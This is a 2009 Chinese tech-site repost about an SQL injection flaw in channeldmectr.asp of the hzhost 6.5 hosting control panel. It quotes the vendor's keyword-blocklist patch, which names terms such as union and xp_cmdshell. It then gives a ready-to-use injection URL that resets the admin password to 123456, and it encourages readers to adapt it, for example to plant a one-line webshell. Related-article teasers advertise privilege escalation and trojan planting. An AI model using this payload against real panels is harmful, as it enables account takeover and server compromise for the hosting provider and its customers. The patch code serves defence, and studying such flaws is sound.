当前位置: 代码网 > 服务器>网络安全>企业安全 > hzhost6.5 华众虚拟主机管理系统最新SQL漏洞(附漏洞补丁)

hzhost6.5 华众虚拟主机管理系统最新SQL漏洞(附漏洞补丁)

2009年07月20日 企业安全 我要评论
hzhost6.5 华众虚拟主机管理系统最新SQL漏洞(附漏洞补丁)其实呢,漏洞一点都不新,在t00ls都躺了N天了,就是不见有人转出来..没记错的话这已经是华众第四次出漏洞了..而且每次犯的还都是一个毛病,我很看好他们的程序员.... 09-07-20

这次漏洞出在channeldmectr.asp这个文件上,跟本就没有过滤任何参数.
正好我这里有正版的补丁,打开看下了,打上补丁的channeldmectr.asp文件在第21行到第40行,增加了以下代码:

复制代码
代码如下:

function saferequest(paraname)
dim paravalue
paravalue=request(paraname)
if isnumeric(paravalue) then
saferequest=paravalue
exit function
else
paravaluetemp=lcase(paravalue)
tempvalue="select|insert|delete|union|
join|script|applet|object|’|drop|update|truncate|
create|xp_cmdshell|exec|alter|cast|rename|modify”
temps=split(tempvalue,”|”)
for mycount=0 to ubound(temps)
if instr(paravaluetemp,temps(mycount)) > 0 and lcase(paraname)<>”module” then
call errorpage(-2,”您提交的内容包含了字符["&temps(mycount)&"],请去除后重新提交或联系我们…”)
response.end
end if
next
saferequest=paravalue
end if
end function

代码的大概意思是对其中红色部分的参数进行过滤,禁止提交,防止执行构造好的sql语句.
利用方法如下:
http://www.xxx.com/incs/channeldmectr.asp?domainname=1′);{我们构造的语句}–
下面给出一个示范语句:
http://www.xxx.com/incs/channeldmectr.asp?domainname=1′);update [memlst] set u_pss=’e10adc3949ba59abbe56e057f20f883e’ where u_nme=’admin’–
语句的意思是将管理员账号admin的密码改为123456.
当然大家也可以灵活运用,构造其他语句,比如写一句话马进去之类的,这里省略.
我这个人比较善良,放出独家收藏华众近期出现的所有漏洞的补丁,有需要的朋友可以下载.

(本文为普瑞斯特编辑整理) http://www.hacksb.cn

(0)

相关文章:

  • FSO的开启方法

    FSO的开启方法

    FSO的开启方法  FSO的开启方法  FSO组件的开启和关闭方法  Dll 文件的注册和注销:... 09-07-22 [阅读全文]
  • 命令行下一种新的加帐号的方法

    命令行下一种新的加帐号的方法

    命令行下一种新的加帐号的方法  今天研究了一下用户控制面板文件nusrmgr.cpl,发现调用的是Shell.Users来加用户,它还同时调用了wscript... [阅读全文]
  • 迅雷提权教程

    迅雷提权教程

    迅雷提权教程当我们使用迅雷下载东西的时候,会调用我们安装迅雷后一个htm文件,去激活htm文件里的一些代码,把我们所下载东西添加到列表当中。所对应的htm文件... [阅读全文]
  • pstools使用方法

    pstools使用方法

    pstools使用方法  软件名称:Pstools   运行平台:Windows   软件授权:免费软件   软件大小:550KB   下面我用一个实例来讲解... [阅读全文]
  • DoS攻击简述

    DoS攻击简述

    DoS攻击简述  DoS攻击由于攻击简单、容易达到目的、难于防止和追查越来越成为常见的攻击方式。对它的总体了解,成为有效避免,查找原因,制订对策提供有用的帮助... [阅读全文]
  • 不一样的挂马方式 TXT挂马

    不一样的挂马方式 TXT挂马

    不一样的挂马方式 TXT挂马我们平常挂马无外乎就那么几种方式,如框架挂马、js挂马、css挂马.  txt不是文本文件吗?它如何挂马?且听我慢慢道来,很简单的... [阅读全文]

版权声明:本文内容由互联网用户贡献,该文观点仅代表作者本人。本站仅提供信息存储服务,不拥有所有权,不承担相关法律责任。 如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件至 2386932994@qq.com 举报,一经查实将立刻删除。

发表评论

验证码:
Copyright © 2017-2025  代码网 保留所有权利. 粤ICP备2024248653号
站长QQ:2386932994 | 联系邮箱:2386932994@qq.com